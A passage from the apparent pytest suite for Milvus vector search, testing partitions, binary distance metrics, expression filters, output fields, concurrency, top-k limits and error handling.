default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search through partitions
log.info("test_search_index_partitions: searching (1000 entities) through partitions")
par = collection_w.partitions
log.info("test_search_index_partitions: partitions: %s" % par)
limit = 1000
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit, default_search_exp,
[par[0].name, par[1].name], _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_names",
[["(.*)"], ["search(.*)"]])
def test_search_index_partitions_fuzzy(self, nb, nq, dim, partition_names, auto_id, _async):
"""
target: test search from partitions
method: search from partitions with fuzzy
partition name
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
dim=dim)[0:4]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search through partitions
log.info("test_search_index_partitions_fuzzy: searching through partitions")
limit = 1000
limit_check = limit
par = collection_w.partitions
if partition_names == ["search(.*)"]:
insert_ids = insert_ids[par[0].num_entities:]
if limit > par[1].num_entities:
limit_check = par[1].num_entities
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit, default_search_exp,
partition_names, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partition_empty(self, nq, dim, auto_id, _async):
"""
target: test search the empty partition
method: search from the empty partition
expected: searched successfully with 0 results
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, auto_id=auto_id,
dim=dim, is_index=True)[0]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create empty partition
partition_name = "search_partition_empty"
collection_w.create_partition(partition_name=partition_name, description="search partition empty")
par = collection_w.partitions
log.info("test_search_index_partition_empty: partitions: %s" % par)
collection_w.load()
# 3. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 4. search the empty partition
log.info("test_search_index_partition_empty: searching %s "
"entities through empty partition" % default_limit)
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, [partition_name],
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
def test_search_binary_jaccard_flat_index(self, nq, dim, auto_id, _async, index):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with JACCARD
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids, time_stamp = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)[0:5]
# 2. create index
default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
collection_w.load()
# 3. compute the distance
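        # Jaccard distance here is assumed to be 1 - (intersection / union) of the
        # set bits; the smaller of the two distances should equal the top-1 result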
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.jaccard(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.jaccard(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "JACCARD", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
def test_search_binary_hamming_flat_index(self, nq, dim, auto_id, _async, index):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with HAMMING
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)[0:4]
# 2. create index
default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "HAMMING"}
collection_w.create_index("binary_vector", default_index)
# 3. compute the distance
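        # Hamming distance counts the bits that differ between two binary vectors;
        # the smaller of the two computed distances should equal the top-1 result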
collection_w.load()
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.hamming(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.hamming(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "HAMMING", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6843")
@pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
def test_search_binary_tanimoto_flat_index(self, nq, dim, auto_id, _async, index):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with TANIMOTO
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)[0:4]
log.info("auto_id= %s, _async= %s" % (auto_id, _async))
# 2. create index
default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "TANIMOTO"}
collection_w.create_index("binary_vector", default_index)
collection_w.load()
# 3. compute the distance
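        # cf.tanimoto is assumed to compute the Tanimoto distance over the bit
        # vectors; the smaller of the two distances should equal the top-1 result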
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "TANIMOTO", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("expression", cf.gen_normal_expressions())
def test_search_with_expression(self, dim, expression, _async):
"""
target: test search with different expressions
method: test search with different expressions
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True,
nb, dim=dim,
is_index=True)[0:4]
# filter result with expression in collection
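        # the generated expressions only reference the scalar fields int64 and float,
        # so binding those names per row lets eval() reproduce the server-side filter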
_vectors = _vectors[0]
expression = expression.replace("&&", "and").replace("||", "or")
filter_ids = []
for i, _id in enumerate(insert_ids):
int64 = _vectors.int64[i]
float = _vectors.float[i]
if not expression or eval(expression):
filter_ids.append(_id)
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. search with expression
log.info("test_search_with_expression: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 7910")
@pytest.mark.parametrize("bool_type", [True, False, "true", "false", 1, 0, 2])
def test_search_with_expression_bool(self, dim, auto_id, _async, bool_type):
"""
target: test search with different bool expressions
method: search with different bool expressions
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. filter result with expression in collection
filter_ids = []
bool_type_cmp = bool_type
if bool_type == "true":
bool_type_cmp = True
if bool_type == "false":
bool_type_cmp = False
for i, _id in enumerate(insert_ids):
if _vectors[0][f"{default_bool_field_name}"][i] == bool_type_cmp:
filter_ids.append(_id)
# 4. search with different expressions
expression = f"{default_bool_field_name} == {bool_type}"
log.info("test_search_with_expression: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("expression", cf.gen_normal_expressions_field(default_float_field_name))
def test_search_with_expression_auto_id(self, dim, expression, _async):
"""
target: test search with different expressions
method: test search with different expressions
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=True,
dim=dim,
is_index=True)[0:4]
# filter result with expression in collection
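        # exec() binds the float field value to a local variable named after the
        # field so that eval(expression) can reproduce the filter client-side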
_vectors = _vectors[0]
expression = expression.replace("&&", "and").replace("||", "or")
filter_ids = []
for i, _id in enumerate(insert_ids):
exec(f"{default_float_field_name} = _vectors.{default_float_field_name}[i]")
if not expression or eval(expression):
filter_ids.append(_id)
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. search with different expressions
log.info("test_search_with_expression: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
def test_search_expression_all_data_type(self, nb, nq, dim, auto_id, _async):
"""
target: test search using different supported data type
method: search using different supported data type
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
log.info("test_search_expression_all_data_type: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
search_exp = "int64 >= 0 && int32 >= 0 && int16 >= 0 " \
"&& int8 >= 0 && float >= 0 && double >= 0"
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
search_exp, _async=_async,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
        assert default_int64_field_name in res[0][0].entity._row_data
        assert default_float_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields_empty(self, nb, nq, dim, auto_id, _async):
"""
target: test search with output fields
method: search with empty output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
log.info("test_search_with_output_fields_empty: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_field(self, auto_id, _async):
"""
target: test search with output fields
method: search with one output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
auto_id=auto_id)[0:4]
# 2. search
log.info("test_search_with_output_field: Searching collection %s" % collection_w.name)
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[default_int64_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert default_int64_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields(self, nb, nq, dim, auto_id, _async):
"""
target: test search with output fields
method: search with multiple output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
log.info("test_search_with_output_fields: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
        assert default_int64_field_name in res[0][0].entity._row_data
        assert default_float_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("output_fields", [["*"], ["*", default_float_field_name]])
def test_search_with_output_field_wildcard(self, output_fields, auto_id, _async):
"""
target: test search with output fields using wildcard
method: search with one output_field (wildcard)
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
auto_id=auto_id)[0:4]
# 2. search
log.info("test_search_with_output_field_wildcard: Searching collection %s" % collection_w.name)
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=output_fields,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
        assert default_int64_field_name in res[0][0].entity._row_data
        assert default_float_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_multi_collections(self, nb, nq, dim, auto_id, _async):
"""
        target: test search on multiple collections with the L2 metric
        method: add vectors into 10 collections, and search each of them
        expected: search status ok and the result length matches the limit
"""
self._connect()
collection_num = 10
for i in range(collection_num):
# 1. initialize with data
log.info("test_search_multi_collections: search round %d" % (i + 1))
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_multi_collections: searching %s entities (nq = %s) from collection %s" %
(default_limit, nq, collection_w.name))
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_concurrent_multi_threads(self, nb, nq, dim, auto_id, _async):
"""
        target: test concurrent search with multiple threads
        method: search from 10 threads that share the same collection
        expected: status ok and each search returns the inserted ids
"""
# 1. initialize with data
threads_num = 10
threads = []
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:5]
def search(collection_w):
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
# 2. search with multi-processes
log.info("test_search_concurrent_multi_threads: searching with %s processes" % threads_num)
for i in range(threads_num):
t = threading.Thread(target=search, args=(collection_w,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
"""
******************************************************************
# The following cases are copied from test_search.py
******************************************************************
"""
def init_data(connect, collection, nb=3000, partition_names=None, auto_id=True):
"""
    Generate entities and insert them into the collection
"""
global entities
if nb == 3000:
insert_entities = entities
else:
insert_entities = gen_entities(nb, is_normal=True)
if partition_names is None:
res = connect.insert(collection, insert_entities)
else:
res = connect.insert(collection, insert_entities, partition_name=partition_names)
connect.flush([collection])
ids = res.primary_keys
return insert_entities, ids
def init_binary_data(connect, collection, nb=3000, insert=True, partition_names=None):
"""
    Generate binary entities and, optionally, insert them into the collection
"""
ids = []
global binary_entities
global raw_vectors
if nb == 3000:
insert_entities = binary_entities
insert_raw_vectors = raw_vectors
else:
insert_raw_vectors, insert_entities = gen_binary_entities(nb)
if insert is True:
if partition_names is None:
res = connect.insert(collection, insert_entities)
else:
res = connect.insert(collection, insert_entities, partition_name=partition_names)
connect.flush([collection])
ids = res.primary_keys
return insert_raw_vectors, insert_entities, ids
def check_id_result(result, id):
limit_in = 5
ids = [entity.id for entity in result]
if len(result) >= limit_in:
return id in ids[:limit_in]
else:
return id in ids
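# Hedged usage sketch (not part of the original suite) showing how the helpers
# above are combined in the tests below; ``connect`` and ``collection`` are the
# pytest fixtures used throughout this file.
#
#   entities, ids = init_data(connect, collection)   # insert and flush 3000 rows
#   connect.load_collection(collection)
#   res = connect.search(collection, **default_query)
#   assert check_id_result(res[0], ids[0])           # first id is among the top hits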
class TestSearchBase:
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_structure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == "FLAT":
return request.param
# else:
# pytest.skip("Skip index Temporary")
"""
generate top-k params
"""
@pytest.fixture(
scope="function",
params=[1, 10]
)
def get_top_k(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=[1, 10, 1100]
)
def get_nq(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_search_flat_top_k(self, connect, collection, get_nq):
"""
        target: test basic search function, all the search params are correct, top_k exceeds the maximum
        method: search with the given vectors and top_k = 16385 (> max_top_k), check the result
        expected: an exception is raised because top_k exceeds max_top_k
"""
top_k = 16385 # max top k is 16384
nq = get_nq
entities, ids = init_data(connect, collection)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
@pytest.mark.skip("r0.3-test")
def _test_search_field(self, connect, collection, get_top_k, get_nq):
"""
        target: test basic search function, all the search params are correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, **query, fields=["float_vector"])
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
res = connect.search(collection, **query, fields=["float"])
for i in range(nq):
assert entities[1]["values"][:nq][i] in [r.entity.get('float') for r in res[i]]
else:
with pytest.raises(Exception):
connect.search(collection, **query)
def _test_search_after_delete(self, connect, collection, get_top_k, get_nq):
"""
        target: test basic search function before and after deletion, all the search params are
                correct, change top-k value.
        check issue #4200: https://github.com/milvus-io/milvus/issues/4200
method: search with the given vectors, check the result
expected: the deleted entities do not exist in the result.
"""
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection, nb=10000)
first_int64_value = entities[0]["values"][0]
first_vector = entities[2]["values"][0]
search_param = get_search_param("FLAT")
query, vecs = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
vecs[:] = []
vecs.append(first_vector)
res = None
if top_k > max_top_k:
with pytest.raises(Exception):
connect.search(collection, **query, fields=['int64'])
# pytest.skip("top_k value is larger than max_topp_k")
pass
else:
res = connect.search(collection, **query, fields=['int64'])
assert len(res) == 1
assert len(res[0]) >= top_k
assert res[0][0].id == ids[0]
assert res[0][0].entity.get("int64") == first_int64_value
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.delete_entity_by_id(collection, ids[:1])
connect.flush([collection])
res2 = connect.search(collection, **query, fields=['int64'])
assert len(res2) == 1
assert len(res2[0]) >= top_k
assert res2[0][0].id != ids[0]
if top_k > 1:
assert res2[0][0].id == res[0][1].id
assert res2[0][0].entity.get("int64") == res[0][1].entity.get("int64")
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
        target: test basic search function, all the search params are correct, test all index params, and build the index
method: add vectors into collection, search with the given vectors, check the result
        expected: the length of the result is top_k; searching the collection with the partition tag returns an empty result
"""
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
else:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.release_collection(collection)
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, **query, partition_names=[default_tag])
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partitions(self, connect, collection, get_simple_index, get_top_k):
"""
        target: test basic search function, all the search params are correct, test all index params, and build the index
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = 2
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_names=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
else:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
res = connect.search(collection, **query, partition_names=[new_tag])
assert res[0]._distances[0] > epsilon
assert res[1]._distances[0] > epsilon
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_flat(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
        target: test basic search function, all the search params are correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP")
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res[0]) == top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
        target: test basic search function, all the search params are correct, test all index params, and build the index
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP",
search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert check_id_result(res[0], ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
        target: test basic search function, all the search params are correct, test all index params, and build the index
method: add vectors into collection, search with the given vectors, check the result
        expected: the length of the result is top_k; searching the collection with the partition tag returns an empty result
"""
top_k = get_top_k
nq = get_nq
metric_type = "IP"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type=metric_type,
search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
else:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
res = connect.search(collection, **query, partition_names=[default_tag])
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_index_partitions(self, connect, collection, get_simple_index, get_top_k):
"""
        target: test basic search function, all the search params are correct, test all index params, and build the index
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = 2
metric_type = "IP"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_names=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
res = connect.search(collection, **query, partition_names=["new_tag"])
assert res[0]._distances[0] < 1 - gen_inaccuracy(res[0]._distances[0])
# TODO:
# assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_without_connect(self, dis_connect, collection):
"""
        target: test search vectors without connection
        method: call the search method on a disconnected instance
        expected: raise an exception
"""
with pytest.raises(Exception) as e:
res = dis_connect.search(collection, **default_query)
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_not_existed(self, connect):
"""
        target: search a collection that does not exist
        method: search with a random collection_name that is not in the db
        expected: status not ok (an exception is raised)
"""
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
res = connect.search(collection_name, **default_query)
@pytest.mark.tags(CaseLabel.L0)
def test_search_distance_l2(self, connect, collection):
"""
target: search collection, and check the result: distance
        method: compare the returned distance with the value computed with the Euclidean (L2) metric
        expected: the returned distance equals the computed value
"""
nq = 2
search_param = {"nprobe": 1}
